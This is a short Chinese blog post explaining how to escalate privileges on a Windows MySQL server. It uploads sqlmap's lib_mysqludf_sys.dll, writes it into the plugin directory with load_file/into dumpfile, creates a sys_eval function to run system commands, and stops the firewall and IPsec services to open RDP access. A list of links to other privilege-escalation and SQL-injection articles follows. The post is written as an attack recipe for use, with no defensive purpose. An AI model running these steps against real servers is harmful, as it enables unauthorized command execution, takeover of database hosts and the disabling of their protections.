老物再谈：SqlMap mysql udf.dll 提权

看了这个：windows 2008 怎么利用mysql（5.0）提权然后想了下发下。不是什么新东西，很多人都应该会了。

以前分享在百度网盘，好像没人看。直接发文字说明不贴图了哦。

sqlmap lib_mysqludf_sys.zip

上传dll文件到任意目录，如：D:/RECYCLER/lib_mysqludf_sys.dll

导入dll,根据版本导入到windows或mysql 插件目录(一般执行select @@plugin_dir 可看到插件目录具体路径)：

select load_file(‘D:/RECYCLER/lib_mysqludf_sys.dll’) into dumpfile’c:/windows/lib_mysqludf_sys.dll’(高版本需要导入上面查询到的插件目录)

创建function：

create function sys_eval returns string soname ‘lib_mysqludf_sys.dll’;

执行命令：

select sys_eval(‘whoami’);

一般情况下不会出现创建不成功哦。

连不上3389可以先停止windows防火墙和筛选

select sys_eval(‘net stop policyagent’);

select sys_eval(‘net stop sharedaccess’);

原文链接：SqlMap mysql udf.dll 提权

相关内容：

科普：Burpsuite导出log配合Sqlmap批量扫描注入点

mof提权带回显带清楚命令版本.php

[分享]一个Linux Kernel 提权Exp查询脚本

sqlmap用户手册[续]

Android ICS adb调试工具系统还原目录遍历漏洞（可提权）

Sqlmap注入技巧收集

sqlmap用户手册

waf 绕过的技巧，SQL 注入中绕过 waf 的技巧

Linux PREF_EVENTS Local Root 2.6.37-3.8.10 x86_64，本地提权

Access SQL 注入参考手册(小抄)，Access Cheat Sheet

Access高级玩法经验解说

利用 xss 执行 sql 注入

MySQL 的 Windows 远程系统级漏洞（Stuxnet 病毒采用的技术）

About Mysql 的那个提权漏洞

星外(7i24)虚拟主机管理系统，提权方案、方法集合

sqlmap 中文使用说明

MySql 被降权提权思路，反弹低权限CmdShell，鸡肋文章，略狗血……

iis6 提权提示 Can not find wmiprvse.exe 的突破方法

基于 Http Header 的 SQL 注入

一些本地提权漏洞，对应的补丁序列号，提权的时候会用到

突破 Sql 防注入过滤程序继续注入的一点方法、经验、技巧总结

MS11-046 本地提权漏洞利用代码

windows2003 x64 提权一点经验

mysql udf 提权要注意的 - 技术文章

sqlmap 使用文档

关于国内各种所谓的“大牛B”，及各种版本的本地提权工具想说的。

星外提权辅助工具（绝非0day，只是辅助工具）

基于 SQL 注入（sql injection） 介绍一些注射技巧 - 技术文章

linux 全自动提权脚本（转）

关于ZKEYS虚拟主机管理提权

Windows Server 2003/2008 本地提权 0day

【渗透】各种提权 渗透 经验 技巧总结大全

【Linux】linux提权 Root权限WebShell提权

关于“最强体积最小提权超猛asp大马”后门问题

【VC源码】MySql,MsSql弱口令混合扫描利用工具

SQL注入攻击和深层攻击方式发掘

【Exp】金山网盾内核模式本地提权

留言评论（旧系统）：